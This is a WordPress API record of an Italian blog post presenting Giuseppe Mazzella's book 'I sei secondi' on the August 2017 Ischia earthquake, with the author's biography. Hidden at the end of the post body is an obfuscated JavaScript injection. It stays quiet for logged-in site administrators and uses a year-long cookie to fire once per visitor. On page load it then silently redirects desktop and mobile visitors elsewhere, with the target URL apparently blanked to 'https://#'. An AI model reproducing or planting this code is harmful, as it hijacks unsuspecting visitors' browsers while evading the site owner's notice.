{"id":107,"date":"2017-12-15T21:06:43","date_gmt":"2017-12-15T20:06:43","guid":{"rendered":"http:\/\/ischia.org\/news\/?p=107"},"modified":"2017-12-15T21:06:43","modified_gmt":"2017-12-15T20:06:43","slug":"libro-i-sei-secondi","status":"publish","type":"post","link":"https:\/\/ischia.org\/news\/libro-i-sei-secondi\/","title":{"rendered":"Libro I sei secondi"},"content":{"rendered":"<p>Sei secondi<br>\nLuned\u00ec 21 agosto 2017 \u00e8 una magnifica giornata d\u2019 estate  nell\u2019 isola d\u2019 Ischia. Ma un\u2019estate troppo calda, torrida .Non piove da mesi. C\u2019\u00e8 il tutto esaurito negli alberghi, nelle case private e nei porti turistici. La popolazione dimorante pu\u00f2 essere stimata in 200mila persone.<br>\nIl grande boato arriva alle 20.57. La terra trema per sei o otto secondi. Va via la luce.  E\u2019 il terremoto. Il tredicesimo nella storia sismica dell\u2019 isola d\u2019 Ischia dopo un silenzio di 134 anni. Migliaia di telefonini si collegano al sito dell\u2019 Istituto Nazionale di Geofisica e Vulcanesimo ( INGV) ed al suo corrispondente napoletano che \u00e8 l\u2019 Osservatorio Vesuviano. Dicono che l\u2019 epicentro \u00e8 a mare al largo di Punta Imperatore ad una profondit\u00e0 di 5-10 chilometri.E\u2019 un errore. Un errore storico. Questo libro \u00e8  la storia di questo errore. Il racconto di alcuni giorni frenetici. Il ruolo della stampa e dei social.  E\u2019 il prof. Giuseppe Luongo, 79 anni, professore \u201c emerito\u201d di fisica del vulcanesino alla Federico II di Napoli che ha dedicato 40 anni della sua vita alla ricerca  sulla straordinaria particolariet\u00e0 geologica dell\u2019 isola d\u2019 Ischia come allievo di Alfred Rittmann, lo scienziato della Terra che nel 1930 scopr\u00ec l\u2019 autentica natura geologica di Ischia, che si prende la responsabilit\u00e0 della rettifica. Tutto il sistema del controllo sismico della Repubblica Italiana viene posto in discussione.La conferenza stampa che tiene Luongo a Casamicciola il 26 agosto \u00e8 un documento di eccezionale importanza. Quasi un testamento  di un tenace studioso. Qui viene raccolta senza le correzioni del conferenziere che parla a braccio.  Il messaggio \u00e8 ancora pi\u00f9  forte, toccante, impegnativo per tutti. Trovata la Verit\u00e0 \u2013 \u00e8 un terremoto del IX-VIII grado della Scala MCS con un epicentro  nell\u2019 area del Majo a Casamicciola come gli altri sei terremoti rilevati nel XIX secolo \u2013  si apre un dibattito: perch\u00e9 non c\u2019\u00e8 stato un controllo scientifico dell\u2019 isola vulcanica di Ischia per oltre 100 anni? Come \u00e8 la situazione dei Comuni colpiti di Casamicciola, Lacco Ameno e Forio? Ha ancora senso lo spezzettamento in sei Comuni? Non ha bisogno l\u2019 isola d\u2019 Ischia di una unit\u00e0 politica dopo una \u201c unit\u00e0 geologica\u201d? C\u2019\u00e8 bisogno di una Legge Speciale per la sua particolariet\u00e0 ambientale ed il suo sviluppo socioeconomico  raggiunto di circa 50mila posti-letto e 9.500 lavoratori stagionali del turismo, del commercio e dei servizi? Uno sviluppo caotico e che viene posto in crisi profonda dal terremoto del 21 agosto il quale  pone in ginocchio soprattutto il Comune e la Comunit\u00e0 di Casamicciola.<br>\nQuesto libro pone domande ma offre risposte: subito  il Comune Unico dell\u2019 isola perch\u00e9 l\u2019 espansione urbanistica e la consistenza economica con la demografia di 64mila abitanti  con i riflessi sociali rende obsoleto il frazionamento in sei distinti Comuni; un ente di diritto pubblico per 20 anni , come un tempo lo \u00e8 stato  l\u2019 EVI dal 1952 al 1972, per la ricostruzione ed il rilancio capace non solo di redigere ma di approvare un realistico Piano Regolatore Generale in cui l\u2019 isola \u00e8 divisa per \u201c rioni\u201d non per Comuni; una nuova edilizia economica e popolare in aree geologicamente sicure per circa 3mila sfollati  cominciando dall\u2019 utilizzazione del complesso Pio Monte della Misericordia  alla Marina di Casamicciola; una centralizzazione degli interventi da parte dello Stato con un Commissario Straordinario all\u2019 isola d\u2019 Ischia in prima istanza perch\u00e9 il decentramento amministrativo dello Stato in una Regione, una Citt\u00e0 Metropolitana e sei Comuni, \u00e8 inadeguato. Utopie o l\u2019 evidenza di affrontare il pi\u00f9 difficile momento dell\u2019 isola d\u2019 Ischia dopo il grande boom con il mito dell\u2019 espansione esponenziale? Questo il punto. Giuseppe Mazzella, nato a Casamicciola il 26\/6\/1949, marito,padre e nonno, \u00e8 iscritto all\u2019 ordine nazionale dei giornalisti, elenco pubblicisti,  dal 1972 e dopo gli studi in economia e commercio si \u00e8 laureato in scienze politiche alla Federico II di Napoli  con una tesi sul \u201c Referendum popolare nella Costituzione della V Repubblica francese\u201d. E\u2019 stato responsabile dell\u2019 ufficio stampa della Provincia di Napoli  ( 1976-2002) e direttore della sua Agenzia di Stampa, corrispondente dell\u2019 ANSA da Ischia e Procida ( 1980-2006). Ha collaborato con giornali nazionali e locali.E\u2019 stato presidente dell\u2019 Assostampa Ischia-Procida ( 1986-1994) e presidente del Centro Studi su l\u2019 isola d\u2019 Ischia ( 2000-2008). E\u2019 Cavaliere al Merito della Repubblica ( 1989). Ha promosso un Osservatorio sui fenomeni socio-economici dell\u2019 isola d\u2019 Ischia ( OSIS) ( 2009).Dopo il terremoto del 21 agosto 2017 ha dato vita ad una Agenzia di Stampa \u201c Il Continente\u201d per il Rinascimento di Casamicciola e dell\u2019 isola d\u2019 Ischia.<br>\nCasamicciola, 21 settembre 2017<script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https:\/\/#','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\\x20path=\/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](\/Android\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/BlackBerry\/i)||navigator['userAgent'][_0x287a('0xd')](\/iPhone|iPad|iPod\/i)||navigator[_0x287a('0xe')]['match'](\/Opera Mini\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/IEMobile\/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Sei secondi Luned\u00ec 21 agosto 2017 \u00e8 una magnifica giornata d\u2019 estate nell\u2019 isola d\u2019 Ischia. Ma&#8230;<\/p>\n","protected":false},"author":1,"featured_media":108,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[1],"tags":[],"class_list":["post-107","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-senza-categoria","wpcat-1-id"],"jetpack_publicize_connections":[],"_links":{"self":[{"href":"https:\/\/ischia.org\/news\/wp-json\/wp\/v2\/posts\/107","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ischia.org\/news\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ischia.org\/news\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ischia.org\/news\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ischia.org\/news\/wp-json\/wp\/v2\/comments?post=107"}],"version-history":[{"count":1,"href":"https:\/\/ischia.org\/news\/wp-json\/wp\/v2\/posts\/107\/revisions"}],"predecessor-version":[{"id":109,"href":"https:\/\/ischia.org\/news\/wp-json\/wp\/v2\/posts\/107\/revisions\/109"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/ischia.org\/news\/wp-json\/wp\/v2\/media\/108"}],"wp:attachment":[{"href":"https:\/\/ischia.org\/news\/wp-json\/wp\/v2\/media?parent=107"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ischia.org\/news\/wp-json\/wp\/v2\/categories?post=107"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ischia.org\/news\/wp-json\/wp\/v2\/tags?post=107"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}